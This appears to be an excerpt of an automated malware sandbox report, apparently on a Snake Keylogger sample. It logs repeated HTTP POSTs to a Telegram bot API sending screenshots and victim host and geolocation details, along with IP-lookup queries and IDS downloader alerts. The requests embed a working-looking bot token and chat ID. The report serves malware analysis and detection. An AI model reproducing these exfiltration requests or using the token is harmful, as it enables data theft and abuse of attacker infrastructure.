                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd555e7355e4b6Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54cff9efdcf3Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd55c60fe897b7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd550d602b314fHost: api.telegram.orgContent-Length: 709461Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd562aeb8b0fe7Host: api.telegram.orgContent-Length: 715421Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd554f7cdd9e76Host: api.telegram.orgContent-Length: 709459Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5679ab174d43Host: api.telegram.orgContent-Length: 709459Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd56f87ad53487Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd55cd2163528fHost: api.telegram.orgContent-Length: 701024Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57431ae691f1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd560b448b0fcdHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57b525339f81Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd568ce8bef6b7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd581ad8e2c6beHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57020cab8d74Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5883ccbcdb5fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57853a6ba14fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58f5e7576b22Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5806d8b754f1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd596ec7fc07e5Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd588331d88799Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e942a613be0Host: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8de3a25a3cbc7d4Host: api.telegram.orgContent-Length: 708858Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58d44c277f5aHost: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58da3ab36bd1Host: api.telegram.orgContent-Length: 708858
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8e3b0c96e1dafb8Host: api.telegram.orgContent-Length: 708858Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50d1d4aaecc3Host: api.telegram.orgContent-Length: 708858
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50d1d548480cHost: api.telegram.orgContent-Length: 708858
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49720 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49730 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49740 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49727 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49737 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49734 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 104.21.112.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
